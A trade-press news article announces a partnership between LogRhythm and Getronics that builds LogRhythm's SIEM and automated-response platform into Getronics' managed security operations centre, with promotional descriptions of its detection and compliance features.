LogRhythm and Getronics partner for comprehensive new SOC solution

Customers benefit from faster and more accurate incident identification and mitigation.

  • Wednesday, 16th December 2020 Posted 3 years ago in by Phil Alsop

LogRhythm, the company powering today’s security operations centres (SOCs), and Getronics, the global IT services group, have announced a further commitment to the partnership that sees LogRhythm’s industry leading SIEM solution integrated into Getronics’ managed security offerings globally.  

The formal partnership allows the companies to tightly integrate LogRhythm’s SIEM solution – winner of SC Awards Europe 2020, Best SIEM Solution – with Getronics data processing and storage, located in the EU and meeting all GDPR regulatory requirements. The standard Getronics offering is a highly cost-efficient, multi-tenant solution, with dedicated cloud. On-premises deployments are available for clients with specific needs. 

The Getronics’ security operations centre, located in Barcelona, is underpinned by LogRhythm’s collection, parsing, processing and long-term storage of logs from a wide range of log sources, with support for over 850 sources (such as Windows, Linux, syslog, Cloud and flow data) and the possibility to create custom parsers to extend this.  

LogRhythm’s unique Machine Data Intelligence framework with over 600,000 normalisation rules provides scaling and efficiency. To feed into this, Getronics has developed a Configuration Management Framework to map full lifecycle requirements for log generation, collection and processing that is both effective and mindful of cost.  

In turn, the output from rule-based processing will identify specific security events and trigger alarms using Getronics’ MITRE ATT&CK based detection playbook. This transforms a data lake of billions of logs into a manageable number of alarms for enrichment with threat intelligence and processing by dedicated security analysts. 

The output also provides the insights needed to report against a wide range of compliance frameworks, including Getronics advanced ISO27001 report which provides both top-level control outcome summaries and highly granular drill-down on individual control data with analyst findings. 

"We are excited to extend this partnership with LogRhythm, one of the most successful and fastest growing security operations companies of our time. Together we are much more than the sum of our parts, and we will innovate and build capabilities for the benefit of Getronics customers." Said Harsha Gowda  CTO of Getronics.

“We pride ourselves on having the most advanced NextGen SIEM platform, which offers comprehensive analytics and security orchestration, automation and response (SOAR) in a single platform. The integration of our award-winning SIEM with Getronics’ SOC will open up a range of exciting security benefits for Getronics’ customers both now and in the future,” said Martin Landless, VP sales Europe at LogRhythm.

The combination of Getronics’ 24x7 security service offerings and the market leading LogRhythm platform offers customers the peace of mind that their environments are being continually monitored by a team of experts using cutting edge toolsets. Investment in the platform and people is managed by Getronics, reducing capital outlay and removing the recruitment and retainment headache of employing security staff, thereby delivering a fully managed SIEM solution.

The extensible and efficient service ensures false positive alarms are rapidly eliminated, with the remaining investigations being raised in integrated LogRhythm case management, with logs and analyst findings attached in an evidence locker. Dedicated incident handlers then apply pre-planned courses of action, adapted to the client-specific context as required, to rapidly contain, mitigate and eradicate any breach. 

Security orchestration and automated response is provided through LogRhythm’s ‘SmartResponse’ functionality, which enables both automatic, scripted response triggering at machine speed in response to alarms – and optional scripted responses that can be triggered manually by an analyst or incident handler. 

The solution includes an option for network traffic analysis including full packet capture, layer 2-7 deep packet inspection and analysis with automatic identification of over 3,500 applications that is fully integrated with the SIEM. This is the gold standard in network detection and forensics, allowing not just identification of unwanted traffic such as Bittorrent but also advanced functions such as file reconstruction to determine exactly what a user sent or received or identifying attacker techniques such as reverse PowerShell.